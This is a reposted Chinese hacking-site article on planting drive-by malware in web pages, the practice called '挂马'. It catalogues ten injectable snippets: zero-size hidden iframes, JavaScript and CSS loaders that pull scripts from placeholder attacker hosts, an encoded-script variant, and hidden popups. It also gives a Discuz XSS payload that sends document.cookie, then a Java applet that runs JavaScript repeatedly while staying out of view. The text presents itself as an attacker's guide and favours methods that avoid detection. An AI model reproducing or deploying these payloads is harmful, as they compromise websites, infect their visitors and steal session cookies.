欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

关于applet挂马的一点研究

来源:本站转载 作者:佚名 时间:2009-09-29 TAG: 我要投稿
转载请注明出处:孤水绕城 http://hi.baidu.com/540410588
      对于挂马大家肯定都不会陌生,关于如何跨站如何挂马的东东早已不再是什么高深的技术,即便是菜鸟一个也能玩的很熟练,不需要很高深的技术,对于挂马的技术现在公布的也无非也就那么几种。



一:框架挂马
     <iframe src=地址 width=0 height=0></iframe>
二:js文件挂马
     首先将以下代码
     document.write("<iframe width='0' height='0' src='地址'></iframe>");
     保存为xxx.js,
     则JS挂马代码为
     <script language=javascript src=xxx.js></script>
三:js变形加密
     <SCRIPT language="JScript.Encode"            src=http://www.xxx.com/muma.txt></script>
     muma.txt可改成任意后缀
四:body挂马
     <body ></body>
五:隐蔽挂马
     top.document.body.innerHTML = top.document.body.innerHTML +      '\r\n<iframe
src="http://www.xxx.com/muma.htm/"></iframe>';
六:css中挂马
     body {
     background-image: url('javascript:document.write("<script           
src=http://www.XXX.net/muma.js></script>")')}
七:JAJA挂马
    <SCRIPT language=javascript>      
    window.open    ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro   
llbars=no,width=1,height=1");
    </script>
八:图片伪装
    <html>
    <iframe src="网马地址" height=0 width=0></iframe>
    <img src="图片地址"></center>
    </html>
九:伪装调用:
     <frameset rows="444,0" cols="*">
     <frame src="打开网页" framborder="no" scrolling="auto" noresize     
marginwidth="0"margingheight="0">
     <frame src="网马地址" frameborder="no" scrolling="no"     noresize     
marginwidth="0"margingheight="0">
     </frameset>
十:高级欺骗
     <a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open
(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizabl
e=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

http://discuz.net/pm.php?action=send&uid=1&message="></textarea>

<script>

document.input.subject.value=document.title;document.input.message.value=document.cookie;document.input.submit

;</script>

     这是某某挂马工具给出的挂马代码,是不是很熟悉,只要把这些语句注入到html或者js文件就ok了,可是这样挂马的方法都有一个弊病就是太容易被发现,因为稍微懂点html的人都能很轻易的找到你木马的来源。对于一些杀毒软件或者google搜索引擎直接就给屏蔽了。

    通过对jsp的学习,发现applet在挂马方面会有一个翻天覆地的改变,下面是我的分析代码:

import java.applet.Applet;
import java.net.MalformedURLException;
import java.net.URL;


public class hacker extends Applet implements Runnable{
        private Thread thread = null;
        private String url;
        public void run()
        {
                try {
                     
                this.getAppletContext().showDocument(new URL("javascript:alert(\"gsrc\")"));

                //转载请注明出处:孤水绕城 http://hi.baidu.com/540410588


                } catch (MalformedURLException e) {
                }
        }
        public void start()
        {
                try {
              
                thread = new Thread(this);

                //转载请注明出处:孤水绕城 http://hi.baidu.com/540410588
                thread.run();
                thread.sleep(1000);
                } catch (Exception e) {
                }
        }
}
     编译成class文件,然后新建一个html页,内容如下:

<applet code="Hacker.class" width="300" height="200">
    不支持java虚拟机
</applet>

      你就会看到很惊讶的一幕,每隔一秒就会弹出“gsrc”来。关于applet挂马的更深入的利用方法还会陆续放到博客上,希望大家多多关注。
【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载